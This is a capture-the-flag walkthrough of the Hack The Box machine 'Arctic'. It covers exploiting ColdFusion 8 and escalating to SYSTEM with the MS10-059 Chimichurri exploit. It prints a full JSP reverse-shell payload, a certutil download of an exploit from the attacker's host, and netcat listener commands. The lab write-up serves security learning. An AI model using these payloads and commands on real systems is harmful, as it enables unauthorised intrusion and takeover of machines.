Arctic is a simple, yet troublesome box, largely due to it’s slow performance and old age.
Step 1: Enumerate with NMAP
We start our investigation with an NMAP scan against the target.
➜ arctic nmap -A -vv 10.129.254.97 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-27 16:27 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:27
Completed Parallel DNS resolution of 1 host. at 16:27, 0.03s elapsed
Initiating Connect Scan at 16:27
Scanning 10.129.254.97 [1000 ports]
Connect Scan Timing: About 15.50% done; ETC: 16:31 (0:02:49 remaining)
Connect Scan Timing: About 30.50% done; ETC: 16:31 (0:02:19 remaining)
Connect Scan Timing: About 45.50% done; ETC: 16:31 (0:01:49 remaining)
Connect Scan Timing: About 60.50% done; ETC: 16:31 (0:01:19 remaining)
Discovered open port 8500/tcp on 10.129.254.97
Discovered open port 49154/tcp on 10.129.254.97
Completed Connect Scan at 16:30, 138.30s elapsed (1000 total ports)
Initiating Service scan at 16:30
Scanning 2 services on 10.129.254.97
Completed Service scan at 16:30, 31.13s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.254.97.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:30
Completed NSE at 16:31, 19.12s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:31
Completed NSE at 16:31, 2.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:31
Completed NSE at 16:31, 0.00s elapsed
Nmap scan report for 10.129.254.97
Host is up, received user-set (0.024s latency).
Scanned at 2023-01-27 16:27:54 EST for 191s
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8500/tcp open http syn-ack JRun Web Server
49154/tcp open unknown syn-ack
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:31
Completed NSE at 16:31, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:31
Completed NSE at 16:31, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:31
Completed NSE at 16:31, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.92 seconds
We can see that there is a web server, JRun Web Server, running on port 8500. Let’s take a look in a browser.
Step 2: Enumerating Web Directories
We navigate to http://10.129.254.97:8500/ and begin our search. After combing through the folder structure we finally find a ColdFusion 8 login page. ColdFusion 8 is ancient by today’s standards, so there may be an exploit that gives us some increased level of access to the box. Let’s search the web for remote ColdFusion 8 exploits that may work on this target.
Step 3: Exploiting ColdFusion 8
Upon searching the web we immediately find the following exploit: https://www.exploit-db.com/exploits/50057. After reading through the code we discover that this exploit uploads an msfvenom reverse shell to the target and provides us with a shell as a non-root user. We simply need to edit the script and provide connection details. Let’s try it out.
➜ arctic python3 50057.py
Generating a payload...
Payload size: 1497 bytes
Saved as: 714b57e370af49a2af084b17248d4f13.jsp
Priting request...
Content-type: multipart/form-data; boundary=5a0d1f5a19fc4e5eb40d113826db328e
Content-length: 1698
--5a0d1f5a19fc4e5eb40d113826db328e
Content-Disposition: form-data; name="newfile"; filename="714b57e370af49a2af084b17248d4f13.txt"
Content-Type: text/plain
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream ia;
OutputStream yK;
StreamConnector( InputStream ia, OutputStream yK )
{
this.ia = ia;
this.yK = yK;
}
public void run()
{
BufferedReader fs = null;
BufferedWriter f8c = null;
try
{
fs = new BufferedReader( new InputStreamReader( this.ia ) );
f8c = new BufferedWriter( new OutputStreamWriter( this.yK ) );
char buffer[] = new char[8192];
int length;
while( ( length = fs.read( buffer, 0, buffer.length ) ) > 0 )
{
f8c.write( buffer, 0, length );
f8c.flush();
}
} catch( Exception e ){}
try
{
if( fs != null )
fs.close();
if( f8c != null )
f8c.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "10.10.14.86", 4444 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
--5a0d1f5a19fc4e5eb40d113826db328e--
Sending request and printing response...
<script type="text/javascript">
window.parent.OnUploadCompleted( 0, "/userfiles/file/714b57e370af49a2af084b17248d4f13.jsp/714b57e370af49a2af084b17248d4f13.txt", "714b57e370af49a2af084b17248d4f13.txt", "0" );
</script>
Printing some information for debugging...
lhost: 10.10.14.86
lport: 4444
rhost: 10.129.254.97
rport: 8500
payload: 714b57e370af49a2af084b17248d4f13.jsp
Deleting the payload...
Listening for connection...
Executing the payload...
Listening on 0.0.0.0 4444
Connection received on 10.129.254.97 49254
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
We have a shell! Now we can grab the user flag and continue our investigation
Step 4: Finding Local Privilege Escalation Paths with Windows-Exploit-Suggester
We can use Windows Exploit Suggester to help us find potential exploits for privilege escalation. We must first gather the systeminfo from the target:
C:\ColdFusion8\runtime\bin>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 29/1/2023, 7:24:14 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 5.120 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 11.279 MB
Virtual Memory: In Use: 1.006 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.254.97
Afterwards, we can supply our script with this output to automate our search for exploits.
➜ Windows-Exploit-Suggester git:(master) ✗ python2.7 windows-exploit-suggester.py --database 2023-01-23-mssb.xls --systeminfo ../arctic_systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
Step 5: Exploiting the Target
We are presented with a list of potential exploits, but most of them do not yield results. MS10-059 is the only exploit that we make any progress with. After searching the web we find the following github repo https://github.com/egre55/windows-kernel-exploits. It contains an exploit, Chimichurri.exe, that may work on the target. Let’s give it a shot.
First we need to transfer the file to the target. We can do this by using python to create an http server and then downloading the file to the target using certutil.
On the attacking machine:
➜ arctic python3 -m http.server 4445
Serving HTTP on 0.0.0.0 port 4445 (http://0.0.0.0:4445/) ...
On the victim machine:
C:\ColdFusion8\runtime\bin>certutil.exe -urlcache -split -f "http://10.10.14.86:4445/Chimichurri.exe" Chimichurri.exe
certutil.exe -urlcache -split -f "http://10.10.14.86:4445/Chimichurri.exe" Chimichurri.exe
**** Online ****
000000 ...
0bf800
CertUtil: -URLCache command completed successfully.
C:\ColdFusion8\runtime\bin>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8
Directory of C:\ColdFusion8\runtime\bin
29/01/2023 07:55 �� <DIR> .
29/01/2023 07:55 �� <DIR> ..
29/01/2023 07:55 �� 784.384 Chimichurri.exe
18/03/2008 11:11 �� 64.512 java2wsdl.exe
19/01/2008 09:59 �� 2.629.632 jikes.exe
18/03/2008 11:11 �� 64.512 jrun.exe
18/03/2008 11:11 �� 71.680 jrunsvc.exe
18/03/2008 11:11 �� 5.120 jrunsvcmsg.dll
18/03/2008 11:11 �� 64.512 jspc.exe
22/03/2017 08:53 �� 1.804 jvm.config
18/03/2008 11:11 �� 64.512 migrate.exe
18/03/2008 11:11 �� 34.816 portscan.dll
18/03/2008 11:11 �� 64.512 sniffer.exe
18/03/2008 11:11 �� 78.848 WindowsLogin.dll
18/03/2008 11:11 �� 64.512 wsconfig.exe
22/03/2017 08:53 �� 1.013 wsconfig_jvm.config
18/03/2008 11:11 �� 64.512 wsdl2java.exe
18/03/2008 11:11 �� 64.512 xmlscript.exe
16 File(s) 4.123.393 bytes
2 Dir(s) 1.430.634.496 bytes free
C:\ColdFusion8\runtime\bin>
We have successfully downloaded the file. Now we just need to run the exploit.
C:\ColdFusion8\runtime\bin>Chimichurri.exe
Chimichurri.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
It looks like we need to set up a listener to catch the new shell that this exploit spawns. We can use netcat for this purpose.
➜ arctic nc -lvnp 4446
Listening on 0.0.0.0 4446
Now we can run the exploit.
Victim machine:
C:\ColdFusion8\runtime\bin>Chimichurri.exe 10.10.14.86 4446
Chimichurri.exe 10.10.14.86 4446
Attacker machine:
Connection received on 10.129.254.97 49322
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>dir
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8
Directory of C:\ColdFusion8\runtime\bin
29/01/2023 07:55 �� <DIR> .
29/01/2023 07:55 �� <DIR> ..
29/01/2023 07:55 �� 784.384 Chimichurri.exe
18/03/2008 11:11 �� 64.512 java2wsdl.exe
19/01/2008 09:59 �� 2.629.632 jikes.exe
18/03/2008 11:11 �� 64.512 jrun.exe
18/03/2008 11:11 �� 71.680 jrunsvc.exe
18/03/2008 11:11 �� 5.120 jrunsvcmsg.dll
18/03/2008 11:11 �� 64.512 jspc.exe
22/03/2017 08:53 �� 1.804 jvm.config
18/03/2008 11:11 �� 64.512 migrate.exe
18/03/2008 11:11 �� 34.816 portscan.dll
18/03/2008 11:11 �� 64.512 sniffer.exe
18/03/2008 11:11 �� 78.848 WindowsLogin.dll
18/03/2008 11:11 �� 64.512 wsconfig.exe
22/03/2017 08:53 �� 1.013 wsconfig_jvm.config
18/03/2008 11:11 �� 64.512 wsdl2java.exe
18/03/2008 11:11 �� 64.512 xmlscript.exe
16 File(s) 4.123.393 bytes
2 Dir(s) 1.430.618.112 bytes free
C:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system
We have access to the system account! The only remaining step is to navigate to the administrator’s desktop and collect the flag.